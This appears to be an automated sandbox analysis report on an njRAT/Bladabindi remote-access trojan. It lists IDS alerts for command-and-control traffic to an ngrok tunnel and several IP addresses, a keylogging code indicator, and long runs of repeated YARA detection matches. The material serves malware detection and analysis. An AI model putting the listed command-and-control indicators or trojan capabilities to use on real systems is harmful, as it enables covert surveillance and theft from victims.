        Source: TrafficSnort IDS: 2033132 ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) 192.168.2.4:49737 -> 3.6.115.64:19208
        Source: TrafficSnort IDS: 2033132 ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) 192.168.2.4:49738 -> 3.6.115.64:19208
        Source: TrafficSnort IDS: 2033132 ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) 192.168.2.4:49739 -> 3.6.115.64:19208
        Source: TrafficSnort IDS: 2033132 ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) 192.168.2.4:49740 -> 3.6.115.64:19208
        Source: TrafficSnort IDS: 2033132 ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) 192.168.2.4:49741 -> 3.6.115.64:19208
        Source: TrafficSnort IDS: 2033132 ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) 192.168.2.4:49742 -> 3.6.115.64:19208
        Source: TrafficSnort IDS: 2033132 ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) 192.168.2.4:49743 -> 3.6.115.64:19208
        Source: TrafficSnort IDS: 2033132 ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) 192.168.2.4:49745 -> 3.6.115.64:19208
        Source: TrafficSnort IDS: 2033132 ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) 192.168.2.4:49746 -> 3.6.115.64:19208
        Source: TrafficSnort IDS: 2033132 ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) 192.168.2.4:49747 -> 3.6.115.64:19208
        Source: TrafficSnort IDS: 2033132 ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) 192.168.2.4:49748 -> 3.6.115.64:19208
        Source: TrafficSnort IDS: 2033132 ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) 192.168.2.4:49749 -> 3.6.115.64:19208
        Source: TrafficSnort IDS: 2033132 ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) 192.168.2.4:49750 -> 3.6.115.64:19208
        Source: TrafficSnort IDS: 2033132 ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) 192.168.2.4:49751 -> 3.6.98.232:19208
        Source: TrafficSnort IDS: 2033132 ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) 192.168.2.4:49752 -> 3.6.98.232:19208
        Source: TrafficSnort IDS: 2033132 ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) 192.168.2.4:49753 -> 3.6.98.232:19208
        Source: TrafficSnort IDS: 2033132 ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) 192.168.2.4:49754 -> 3.6.98.232:19208
        Source: TrafficSnort IDS: 2033132 ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) 192.168.2.4:49755 -> 3.6.115.182:19208
        Source: Malware configuration extractorURLs: 0.tcp.in.ngrok.io
        Source: global trafficTCP traffic: 3.6.115.182 ports 0,1,2,8,9,19208
        Source: global trafficTCP traffic: 3.6.98.232 ports 0,1,2,8,9,19208
        Source: global trafficTCP traffic: 3.6.115.64 ports 0,1,2,8,9,19208
        Source: global trafficTCP traffic: 192.168.2.4:49735 -> 3.6.115.64:19208
        Source: global trafficTCP traffic: 192.168.2.4:49751 -> 3.6.98.232:19208
        Source: global trafficTCP traffic: 192.168.2.4:49755 -> 3.6.115.182:19208
        Source: Joe Sandbox ViewIP Address: 3.6.115.182 3.6.115.182
        Source: Joe Sandbox ViewIP Address: 3.6.115.64 3.6.115.64
        Source: Joe Sandbox ViewIP Address: 3.6.98.232 3.6.98.232
        Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
        Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
        Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownDNS traffic detected: queries for: 0.tcp.in.ngrok.io

        Key, Mouse, Clipboard, Microphone and Screen Capturing

        barindex
        Source: 0.2.nOZ2Oqnzbz.exe.620000.1.raw.unpack, kl.cs.Net Code: VKCodeToUnicode
        Source: 4.2.WindowsServices.exe.2030000.1.raw.unpack, kl.cs.Net Code: VKCodeToUnicode
        Source: 9.2.WindowsServices.exe.710000.1.raw.unpack, kl.cs.Net Code: VKCodeToUnicode
        Source: 18.2.WindowsServices.exe.710000.2.raw.unpack, kl.cs.Net Code: VKCodeToUnicode

        E-Banking Fraud

        barindex
        Source: Yara matchFile source: 21.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.nOZ2Oqnzbz.exe.620000.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 18.2.WindowsServices.exe.710000.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 9.2.WindowsServices.exe.710000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 18.2.WindowsServices.exe.710000.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.2.WindowsServices.exe.2030000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.nOZ2Oqnzbz.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.nOZ2Oqnzbz.exe.620000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 21.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.1.nOZ2Oqnzbz.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.2.WindowsServices.exe.2030000.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 9.2.WindowsServices.exe.710000.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000003.00000001.1622653956.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.1708951126.0000000002030000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000015.00000001.1928333872.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.1698435023.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000015.00000001.1928333872.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.1624278132.0000000000620000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000001.1734806428.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000009.00000002.1738131308.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000015.00000002.1991883581.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000001.1734806428.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000012.00000002.1941148934.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.1801120260.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000015.00000002.1991883581.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000001.1705766648.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.1801120260.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.1698435023.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000001.1705766648.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000001.1622653956.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: nOZ2Oqnzbz.exe PID: 7116, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: nOZ2Oqnzbz.exe PID: 6500, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: WindowsServices.exe PID: 2668, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: WindowsServices.exe PID: 1896, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: WindowsServices.exe PID: 3484, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: WindowsServices.exe PID: 6516, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: WindowsServices.exe PID: 1868, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: WindowsServices.exe PID: 6400, type: MEMORYSTR

        System Summary

        barindex
        Source: 21.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 21.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
        Source: 21.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 21.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
        Source: 21.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
        Source: 0.2.nOZ2Oqnzbz.exe.620000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 0.2.nOZ2Oqnzbz.exe.620000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
        Source: 0.2.nOZ2Oqnzbz.exe.620000.1.raw.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 0.2.nOZ2Oqnzbz.exe.620000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
        Source: 0.2.nOZ2Oqnzbz.exe.620000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
        Source: 12.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 12.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
        Source: 12.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 12.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
        Source: 12.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
        Source: 18.2.WindowsServices.exe.710000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 18.2.WindowsServices.exe.710000.2.unpack, type: UNPACKEDPEMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
        Source: 18.2.WindowsServices.exe.710000.2.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 18.2.WindowsServices.exe.710000.2.unpack, type: UNPACKEDPEMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
        Source: 18.2.WindowsServices.exe.710000.2.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
        Source: 9.2.WindowsServices.exe.710000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 9.2.WindowsServices.exe.710000.1.unpack, type: UNPACKEDPEMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
        Source: 9.2.WindowsServices.exe.710000.1.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 9.2.WindowsServices.exe.710000.1.unpack, type: UNPACKEDPEMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
        Source: 9.2.WindowsServices.exe.710000.1.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
        Source: 7.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 7.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
        Source: 7.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 7.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
        Source: 7.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
        Source: 18.2.WindowsServices.exe.710000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 18.2.WindowsServices.exe.710000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
        Source: 18.2.WindowsServices.exe.710000.2.raw.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 18.2.WindowsServices.exe.710000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
        Source: 18.2.WindowsServices.exe.710000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
        Source: 4.2.WindowsServices.exe.2030000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 4.2.WindowsServices.exe.2030000.1.unpack, type: UNPACKEDPEMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
        Source: 4.2.WindowsServices.exe.2030000.1.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 4.2.WindowsServices.exe.2030000.1.unpack, type: UNPACKEDPEMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
        Source: 4.2.WindowsServices.exe.2030000.1.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
        Source: 3.2.nOZ2Oqnzbz.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 3.2.nOZ2Oqnzbz.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
        Source: 3.2.nOZ2Oqnzbz.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 3.2.nOZ2Oqnzbz.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
        Source: 3.2.nOZ2Oqnzbz.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
        Source: 0.2.nOZ2Oqnzbz.exe.620000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 0.2.nOZ2Oqnzbz.exe.620000.1.unpack, type: UNPACKEDPEMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
        Source: 0.2.nOZ2Oqnzbz.exe.620000.1.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 0.2.nOZ2Oqnzbz.exe.620000.1.unpack, type: UNPACKEDPEMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
        Source: 0.2.nOZ2Oqnzbz.exe.620000.1.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
        Source: 21.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 21.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
        Source: 21.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 21.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
        Source: 21.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
        Source: 12.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 12.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
        Source: 12.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 12.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
        Source: 12.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
        Source: 3.1.nOZ2Oqnzbz.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 3.1.nOZ2Oqnzbz.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
        Source: 4.2.WindowsServices.exe.2030000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 3.1.nOZ2Oqnzbz.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 3.1.nOZ2Oqnzbz.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
        Source: 3.1.nOZ2Oqnzbz.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
        Source: 4.2.WindowsServices.exe.2030000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
        Source: 4.2.WindowsServices.exe.2030000.1.raw.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 4.2.WindowsServices.exe.2030000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
        Source: 4.2.WindowsServices.exe.2030000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
        Source: 9.2.WindowsServices.exe.710000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 9.2.WindowsServices.exe.710000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
        Source: 9.2.WindowsServices.exe.710000.1.raw.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 9.2.WindowsServices.exe.710000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
        Source: 9.2.WindowsServices.exe.710000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
        Source: 00000003.00000001.1622653956.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 00000003.00000001.1622653956.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 00000003.00000001.1622653956.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
        Source: 00000004.00000002.1708951126.0000000002030000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 00000004.00000002.1708951126.0000000002030000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
        Source: 00000004.00000002.1708951126.0000000002030000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 00000004.00000002.1708951126.0000000002030000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
        Source: 00000004.00000002.1708951126.0000000002030000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
        Source: 00000015.00000001.1928333872.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 00000015.00000001.1928333872.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 00000015.00000001.1928333872.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
        Source: 00000003.00000002.1698435023.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 00000003.00000002.1698435023.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 00000003.00000002.1698435023.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
        Source: 00000015.00000001.1928333872.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 00000015.00000001.1928333872.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 00000015.00000001.1928333872.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
        Source: 00000000.00000002.1624278132.0000000000620000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 00000000.00000002.1624278132.0000000000620000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
        Source: 00000000.00000002.1624278132.0000000000620000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 00000000.00000002.1624278132.0000000000620000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
        Source: 00000000.00000002.1624278132.0000000000620000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
        Source: 0000000C.00000001.1734806428.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 0000000C.00000001.1734806428.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 0000000C.00000001.1734806428.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
        Source: 00000009.00000002.1738131308.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 00000009.00000002.1738131308.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
        Source: 00000009.00000002.1738131308.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 00000009.00000002.1738131308.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
        Source: 00000009.00000002.1738131308.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
        Source: 00000015.00000002.1991883581.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 00000015.00000002.1991883581.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 00000015.00000002.1991883581.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
        Source: 0000000C.00000001.1734806428.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 0000000C.00000001.1734806428.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 0000000C.00000001.1734806428.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
        Source: 00000012.00000002.1941148934.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 00000012.00000002.1941148934.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
        Source: 00000012.00000002.1941148934.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 00000012.00000002.1941148934.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
        Source: 00000012.00000002.1941148934.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
        Source: 0000000C.00000002.1801120260.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 0000000C.00000002.1801120260.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 0000000C.00000002.1801120260.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
        Source: 00000015.00000002.1991883581.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 00000015.00000002.1991883581.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 00000015.00000002.1991883581.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
        Source: 00000007.00000001.1705766648.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 00000007.00000001.1705766648.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 00000007.00000001.1705766648.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
        Source: 0000000C.00000002.1801120260.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 0000000C.00000002.1801120260.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 0000000C.00000002.1801120260.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
        Source: 00000003.00000002.1698435023.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 00000003.00000002.1698435023.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 00000003.00000002.1698435023.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
